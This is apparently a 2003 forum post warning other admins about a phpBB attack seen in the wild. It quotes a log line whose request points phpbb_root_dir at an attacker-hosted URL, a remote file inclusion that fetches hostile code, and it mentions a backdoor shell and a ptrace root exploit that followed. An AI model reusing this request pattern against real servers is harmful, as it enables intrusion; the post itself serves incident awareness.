phpbb exploit

Probably old news, but this hit a few of our customers today. A request comes in like so:

57.66.3.199 - - [03/Jun/2003:15:28:56 -0600] "GET /phpbb/install.php?phpbb_root_dir=http://57.66.3.199/ass/ HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" www.customerwebsite.com

Shortly thereafter, two files are upload, bd.pl and ex.c

One allows for shell access via a random port (55557 in our case), the other attempts to exploit a Linux ptrace local root vulnerability.

Our user accounts are chrooted and have no compiler available, so no damage done here, but you may want to look at your systems some.

 

 

 

 

Top